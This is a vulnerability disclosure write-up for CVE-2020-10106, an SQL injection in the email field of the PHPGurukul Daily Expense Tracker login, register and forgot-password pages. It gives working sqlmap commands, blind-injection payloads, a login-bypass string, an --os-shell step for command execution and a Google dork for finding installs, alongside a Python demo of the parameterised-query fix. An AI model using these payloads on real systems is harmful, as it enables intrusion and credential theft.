CVE-2020-10106

Daily Expense Tracker System (DETS) is vulnerable to SQL injection. This post is a brief write-up of the discovery and exploitation of CVE-2020-10106. The vulnerabilities exist in version 1 of the Daily Expense Tracker System project, which can be downloaded from PHPGurukul here.

According to PHPGurukul's website, this application had been downloaded 499 times at the time of vulnerability discovery. Using the Google Dork intitle:"Daily Expense Tracker - Login" turns up some sites that could be vulnerable, although that is unknown without confirmation.


Discovering the Vulnerability

I installed the DETS application using Bitnami XAMPP for Linux (aka LAMPP). The user lands on a login page within index.php. After static code analysis, it appeared that the SQL query could be vulnerable, specifically through the email parameter. I believe the password parameter is not vulnerable to SQL injection because user input is hashed on the client side. This means that SQL injection payloads are hashed before they reach the server, so the SQL engine never sees their special characters. The same cannot be said of the email parameter, whose user input is placed directly in the SQL query.

[Screenshot: index.php contents]

Verifying the Vulnerability

I captured a login request with Burp Suite and exported it to a file, which allows further investigation using sqlmap.

[Screenshot: Login request]
[Screenshot: sqlmap output]

I appreciate that the sqlmap output could be squashed a lot in this instance. Here is the key information:

$ sqlmap -r <login-request-file> --dbms=mysql

sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:

---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=oliver@frostylabs.net' AND (SELECT 7366 FROM (SELECT(SLEEP(5)))NgAy) AND 'KQtM'='KQtM&password=p4ssw0rd&login=login
---

The application is vulnerable to unauthenticated time-based blind SQL injection. Using sqlmap's --dump flag, it is possible to dump the users table, along with the associated account password hash.

[Screenshot: tables]
[Screenshot: tbluser contents]

When valid credentials are supplied in the sqlmap request, it is possible to perform a boolean-based blind SQL injection instead.

---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: email=test@gmail.com' AND 7009=7009 AND 'wGtm'='wGtm&password=123&login=login
---

Further Exploitation

In addition to index.php, the same vulnerabilities as described above exist in register.php and forgot-password.php.

In addition to the blind SQL injection, the following payload allows a complete bypass of the login prompt. The login form requires that a well-formed email address is entered, otherwise the browser does not permit the form to be submitted; this is overcome by intercepting the POST request and altering the email value. The HTTP 302 response seen in the image below shows that the SQL injection has been successful.

a' OR '1'='1'; -- -
[Screenshot: SQL Injection Authentication Bypass]
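The two observations above (the email parameter being concatenated into the query while the password is hashed client-side, and the `a' OR '1'='1'; -- -` bypass) can be reproduced in a small model of the login query. The following Python code is an added example written for this post, not the DETS source; it uses an in-memory SQLite table with constructed rows and assumes column names and an MD5 client-side hash, since the page does not show the real schema or hash algorithm. It puts the string-built query beside the parameterised fix and checks which of the two acts as the boolean oracle sqlmap reported.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for the DETS tbluser table.
# The real schema is not shown on the page; the column names are assumed.
SAMPLE_USERS = [
    ("test@gmail.com", "123"),
]


def client_side_hash(password: str) -> str:
    """Model of the hashing the login page performs in the browser.
    The page only says the password is hashed client-side; MD5 is an
    assumption made for this example."""
    return hashlib.md5(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed tbluser rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tbluser (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO tbluser (email, password) VALUES (?, ?)",
        [(email, client_side_hash(pw)) for email, pw in SAMPLE_USERS],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """String-built query, as suspected in index.php: the email value becomes
    part of the SQL text, so quotes and keywords in it are parsed by the
    database engine. The password is hashed first, so a payload placed in the
    password field is reduced to hex digits and cannot break out of its quotes."""
    hashed = client_side_hash(password)
    sql = (
        "SELECT id, email FROM tbluser "
        f"WHERE email='{email}' AND password='{hashed}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, email, password):
    """Parameterised query: the values travel separately from the SQL text,
    so a quote inside the email is only a character to compare against."""
    hashed = client_side_hash(password)
    sql = "SELECT id, email FROM tbluser WHERE email=? AND password=?"
    return conn.execute(sql, (email, hashed)).fetchone()


def boolean_oracle_leaks(login, conn, email, password) -> bool:
    """Return True if `login` answers differently to a TRUE and a FALSE
    condition injected after a known-good email (the shape of the
    boolean-based blind payload sqlmap reported), i.e. it behaves as an
    oracle that can be used to read data one bit at a time."""
    true_cond = f"{email}' AND 7009=7009 AND 'wGtm'='wGtm"
    false_cond = f"{email}' AND 7009=7010 AND 'wGtm'='wGtm"
    try:
        r_true = login(conn, true_cond, password)
        r_false = login(conn, false_cond, password)
    except sqlite3.Error:
        # A syntax error is also a signal, but it is not a clean boolean oracle.
        return False
    return (r_true is not None) != (r_false is not None)


if __name__ == "__main__":
    conn = setup_db()
    bypass = "a' OR '1'='1'; -- -"
    print("vulnerable, bypass in email   :", login_vulnerable(conn, bypass, "x"))
    print("vulnerable, bypass in password:", login_vulnerable(conn, "test@gmail.com", bypass))
    print("safe, bypass in email         :", login_safe(conn, bypass, "x"))
    print("vulnerable is boolean oracle  :", boolean_oracle_leaks(login_vulnerable, conn, "test@gmail.com", "123"))
    print("safe is boolean oracle        :", boolean_oracle_leaks(login_safe, conn, "test@gmail.com", "123"))
```

Running the block shows the string-built query returning the first user for the bypass payload and acting as a true/false oracle, while the parameterised version returns nothing for the same inputs. The fix for index.php, register.php and forgot-password.php is the same change `login_safe` makes: bind the email (and every other user-supplied value) as a query parameter rather than interpolating it into the SQL text.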

Bonus

It is possible to leverage the SQL injection vulnerability to get remote command execution. However, the RCE depends on the SQLi, so in my opinion the web application is not directly vulnerable to RCE, but rather to RCE through SQLi. sqlmap is able to obtain this with the --os-shell flag.

$ sqlmap -r <login-request-file> --dbms=mysql --os-shell
[Screenshot: Spawn a pseudo shell]
